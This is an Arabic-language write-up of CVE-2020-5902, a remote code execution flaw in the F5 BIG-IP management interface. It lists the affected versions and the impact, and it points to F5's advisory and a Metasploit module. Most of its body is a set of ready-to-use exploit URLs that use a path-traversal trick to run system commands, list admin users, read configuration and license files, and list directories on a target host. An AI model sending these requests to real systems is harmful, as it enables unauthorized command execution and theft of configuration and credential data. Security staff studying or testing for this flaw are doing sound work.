
[CVE-2020-5902] F5 BIG-IP تنفيذ التعليمات البرمجية عن بُعد (RCE)
[CVE-2020-5902] تنفيذ التعليمات البرمجية عن بُعد في واجهة إدارة حركة المرور (TMUI) من F5 BIG-IP
في إصدارات BIG-IP 15.0.0-15.1.0.3، 14.1.0-14.1.2.5، 13.1.0-13.1.3.3، 12.1.0-12.1.5.1، و11.6.1-11.6.5.1، تحتوي واجهة إدارة حركة المرور (TMUI)، والتي يُشار إليها أيضًا باسم أداة التكوين، على ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) في صفحات غير معلنة.
تسمح هذه الثغرة للمهاجمين غير المصادَق عليهم، أو المستخدمين المصادَق عليهم، الذين لديهم وصول شبكي إلى أداة التكوين عبر منفذ إدارة BIG-IP و/أو عناوين IP الذاتية، بتنفيذ أوامر نظام عشوائية، أو إنشاء أو حذف ملفات، أو تعطيل الخدمات، و/أو تنفيذ كود Java عشوائي. قد تؤدي هذه الثغرة إلى اختراق كامل للنظام. نظام BIG-IP في وضع Appliance معرّض أيضًا لهذه الثغرة. لا يتم كشف هذه المشكلة على مستوى البيانات (data plane)؛ حيث يتأثر مستوى التحكم (control plane) فقط.
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release
https://{host}/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
https://{host}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf
https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/usr/local/www/
تم نشر الاستشارة الأمنية الأصلية بواسطة F5 ويمكنك الوصول إليها من هنا
أيضًا، توجد وحدة metasploit متاحة لـ CVE-2020-5902 بتقييم ممتاز. يمكنك الاطلاع على أكواد روبي الخاصة بوحدة metasploit من exploits/linux/http/f5_bigip_tmui_rce.rb